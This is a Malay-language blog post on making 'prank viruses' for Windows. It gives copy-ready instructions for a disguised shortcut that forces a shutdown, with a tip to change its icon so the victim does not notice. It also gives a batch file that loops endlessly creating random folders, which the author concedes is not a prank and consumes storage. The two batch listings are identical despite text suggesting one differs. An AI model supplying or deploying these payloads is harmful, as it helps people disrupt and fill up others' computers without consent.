Cara Buat Prank Virus




Assalamualaikum..
Hari ni Admin akan berkongsi cara untuk buat prank virus. Prank virus ni boleh korang ketogerikan sebagai virus tipu2 la.. kah3.. korang pilih la virus tipu2 camna korang nak Admin rasa sudah lebih 3 entri tentang virus prank Admin post. So korang pilih2 la..

1. Virus Shutdown

Step 1. korang right click di dekstop korang dan pergi ke new>shortcut

Step 2. keluar gambar seperti gambar diatas korang masukkan koding di bawah

shutdown -s -t 300 -c "Your Message"

Step 3.Korang klik next pastu finish. Mudah kan.. :)
Note: korang nak buat lagi tidak perasan korang boleh menukar icon .(rightclick kt fail yang korang save pastu properties change icon ape2 yang korang nk ..


2. Virus Berjangkit
Haa.. korang heran kan xpenah dengar... Admin yang namakan kah3..
kenapa Admin namakan macam tu? kerana virus ini akan menambah folder apabila diklik contoh gambar dibawah keh3..

Cara membuat virus ini

Step 1.Buka notepad korang pastu korang copy paste koding dibawah
@echo off
color 0a
:eh
md %random%
goto eh  
Atau 

@echo off
color 0a
:eh
md %random%
goto eh 
(koding warna merah ia akan makan memory space)
korang save dengan apa2 nama sekalipun tetapi dengan syarat mesti fail .bat
contohnya pensil.bat
Korang boleh mencubanya sendiri.. yang ke 2 tu bukan prank k.. 
Sorry video ini yang selenger kerana menulis dalam keadaan tergesa-gesa..
bz sket :p


0 comments:

Catat Ulasan